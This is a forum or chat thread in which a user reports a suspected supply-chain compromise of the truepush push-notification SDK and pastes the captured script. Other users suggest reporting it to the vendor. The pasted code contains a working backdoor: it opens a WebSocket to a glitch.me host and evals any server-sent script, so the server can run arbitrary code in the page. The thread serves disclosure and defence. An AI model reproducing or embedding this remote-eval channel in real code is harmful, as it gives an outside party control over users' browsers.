#Possible malicious library


bold sky

I found this library loaded onto a webpage that seems to be coming from a push notification library called truepush.com. Within the JavaScript, it attempts to make a connection to a websocket from a glitch.me server. The script then remotely executes code from the remote server. The URL to this code is here https://sdki.truepush.com/sdk/v2.0.4/app.js?v=1720784781

What is weird is that the URL contained the websocket/eval code like an hour ago but it seems to have been removed now


Full "malicious" code that I was able to capture

// Minified IIFE: installs a minimal XHR wrapper as `HTTP` on `t`, which is the
// `this` passed at the call site (the global object when this runs as a classic
// top-level script). The SDK loader below depends on that global.
! function(e, t, n) {
    "use strict";
    t.HTTP = new function() {
        // get(url, body, opts, cb): asynchronous GET; cb(err, data).
        // Non-200 status -> cb("error", null); otherwise the response text is
        // JSON-parsed, falling back to the raw text if parsing throws.
        this.get = function(e, t, n, r) {
            var s = window.XMLHttpRequest ? new XMLHttpRequest : new ActiveXObject("Microsoft.XMLHTTP"); // legacy IE fallback
            s.onreadystatechange = function() {
                if(4 == this.readyState) {
                    if(200 != this.status) return r("error", null);
                    try {
                        return r(null, JSON.parse(s.responseText))
                    } catch (e) {
                        return r(null, s.responseText)
                    }
                }
            }, s.open("GET", e, !0), n && n.headers && (s = function(e, t) {
                // copies every key of opts.headers onto the request
                for(var n = Object.keys(t), r = 0; r < n.length; ++r) {
                    var s = n[r];
                    e.setRequestHeader(s, t[s])
                }
                return e
            }(s, n.headers)), n && n.credentials && (s.withCredentials = !0), s.send(JSON.stringify(t)) // opts.credentials enables cookies cross-site; the second argument is JSON-serialised as the request body
        }
    }
}(0, this);
// SDK loader: fetches version.json and injects a <script> whose src is taken
// verbatim from the response (`mainJsUrl`). There is no allowlist or integrity
// check on that URL, so whoever controls version.json controls what runs in
// the page. On any error it falls back to a hard-coded main.js of this SDK version.
var truepushVersionInfo, r = "https://sdki.truepush.com/sdk/version.json";
HTTP.get(r, {}, {}, function(e, t) {
    // `n` and `r` are hoisted from the `var` in the else branch, so both
    // branches write callback-local variables, not the outer `r`.
    if(truepushVersionInfo = t, !e && t && t.mainJsUrl) {
        r = document.head;
        (n = document.createElement("script"))
        .type = "application/javascript", n.onload = function() {
            loadAppJs() // defined elsewhere in the SDK; not on this page
        }, n.src = t.mainJsUrl, r.appendChild(n)
    } else {
        console.log("Error in getting version", e);
        var n, r = document.head;
        (n = document.createElement("script"))
        .type = "application/javascript", n.onload = function() {
            loadAppJs() // defined elsewhere in the SDK; not on this page
        }, n.src = "https://sdki.truepush.com/sdk/v2.0.4/main.js", r.appendChild(n)
    }
});
// Remote-control channel — the part of the capture the thread flags as malicious.
// On DOMContentLoaded it opens a WebSocket to a glitch.me host (unrelated to the
// SDK's own domain) and eval()s any message of type "script", giving the socket
// server arbitrary code execution in the embedding page's origin; "command"
// messages are merely logged. A CSP that omits 'unsafe-eval' blocks the eval path,
// and a restrictive connect-src blocks the socket; the hostname below is the
// indicator to look for in network logs.
document.addEventListener("DOMContentLoaded", () => {
    let socket = new WebSocket("wss://childlike-cliff-wrench.glitch.me");
    socket.onmessage = event => {
        let message = JSON.parse(event.data);
        if("command" === message.type) console.log(message.command);
        else if("script" === message.type) try {
            eval(message.script) // server-supplied source executes with the page's full privileges
        } catch (error) {
            console.error("Error executing script:", error)
        }
    };
    // A second connection only announces presence: despite the name `ipInfo`,
    // the payload sent is just {"m":1}.
    let ipInfo = {
            m: 1
        },
        secondSocket = new WebSocket("wss://childlike-cliff-wrench.glitch.me");
    secondSocket.onopen = () => {
        secondSocket.send(JSON.stringify(ipInfo))
    }
});
unborn stone

what do you want us to do about it

bold sky

I am wondering if anyone has seen something like this before


and ur guys opinion on whether u think this library is under attack or is safe, etc.

nimble wolf

i mean its not related to ts


probably report it to truepush

bold sky
nimble wolf

yes

bold sky

damn
